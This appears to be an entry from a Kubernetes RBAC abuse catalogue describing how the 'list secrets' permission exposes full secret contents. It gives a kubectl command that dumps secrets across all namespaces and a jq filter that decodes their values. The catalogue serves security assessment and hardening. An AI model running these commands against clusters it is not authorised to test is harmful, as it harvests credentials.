can-i gtfo?

Kubernetes RBAC Abuse Collection

list secrets

Verb: list

Resource: secrets

Description: List all secrets in Kubernetes namespaces

Abuses

Information Disclosure

List cannot only return the name of a resource but also its full details.

# Dump secrets across all namespaces
kubectl get secrets --all-namespaces -o json

# Extract values base64 decoded
jq '{
  secrets: [.items[] |
    {
      name: .metadata.name,
      data: ( .data // {} | with_entries(.value |= @base64d) )
    }
  ]
}' secrets.json

References

https://kubernetes.io/docs/reference/access-authn-authz/authorization/#request-verb-resource